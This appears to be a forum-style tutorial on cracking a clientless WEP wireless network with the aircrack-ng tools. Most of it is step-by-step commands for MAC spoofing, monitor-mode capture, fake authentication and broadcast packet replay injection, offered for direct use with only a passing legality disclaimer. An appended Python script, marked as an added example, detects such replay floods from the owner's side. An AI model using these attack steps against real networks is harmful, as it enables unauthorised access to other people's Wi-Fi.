Cracking a clientless WEP AP
Not all APs have a client connected. I'll assume you already have a supported card and that injection is working! I'll also assume that you know what you're doing and you're not doing anything illegal! DON'T GO CRACKING NEIGHBOURs wifi...
1) stop the card
airmon-ng stop wlan0
ifconfig wlan0 down
2) change card mac
ifconfig wlan0 hw ether 00:11:22:33:44:55 up
3) get some access points
iwlist wlan0 scan
4) start it in monitor mode
airmon-ng start wlan0
5) start dumping packets
airodump-ng -c channel -w file --bssid ap_mac wlan0
6) fake auth
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
7) play some fake packets (you should see the packets grow fast in the airodump-ng window)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
8) crack it !!!
If something's wrong, you're probably not auth'ed, or the injection doesn't work, or you're too far away, bla bla bla. Not my problem.
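
Seen from the AP owner's side, the step 7 traffic has a recognisable shape: frame control 0841 is a data frame with the ToDS and Protected bits set, the destination is broadcast, and one source MAC sends it far faster than a real client would. The detector below is an added example, not part of the original post; the record layout, the 1-second window, the 100-frame threshold and the sample frames (including the AP and client MACs) are assumptions constructed for illustration.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def is_replay_shaped(fc, dst):
    """True for the frame shape used in step 7: data, ToDS + Protected, broadcast destination."""
    fc0, fc1 = fc >> 8, fc & 0xFF        # bytes as written on the page: 08 41
    is_data = (fc0 & 0x0C) == 0x08       # type bits say "data"
    to_ds_only = (fc1 & 0x03) == 0x01    # ToDS set, FromDS clear
    protected = bool(fc1 & 0x40)         # Protected (WEP) bit
    return is_data and to_ds_only and protected and dst.lower() == BROADCAST

def find_replay_sources(frames, window=1.0, threshold=100):
    """Return {(bssid, src): peak frames per window} for sources at or above threshold."""
    times = defaultdict(list)
    for ts, bssid, src, dst, fc_hex in frames:
        if is_replay_shaped(int(fc_hex, 16), dst):
            times[(bssid.lower(), src.lower())].append(ts)
    flagged = {}
    for key, stamps in times.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged

def sample_capture():
    # Constructed records: (seconds, bssid, source, destination, frame control hex).
    ap = "02:00:00:00:00:01"
    frames = [(i * 0.002, ap, "00:11:22:33:44:55", BROADCAST, "0841") for i in range(400)]
    frames += [(i * 0.5, ap, "02:00:00:00:00:aa", BROADCAST, "0841") for i in range(4)]
    frames += [(i * 0.01, ap, "02:00:00:00:00:aa", ap, "0841") for i in range(200)]
    return frames

if __name__ == "__main__":
    for (bssid, src), peak in find_replay_sources(sample_capture()).items():
        print(f"possible replay flood on {bssid}: {src} sent {peak} frames in one window")
```

The constructed legitimate client also sends broadcast ToDS frames, but only a few per second, so it stays well under the threshold.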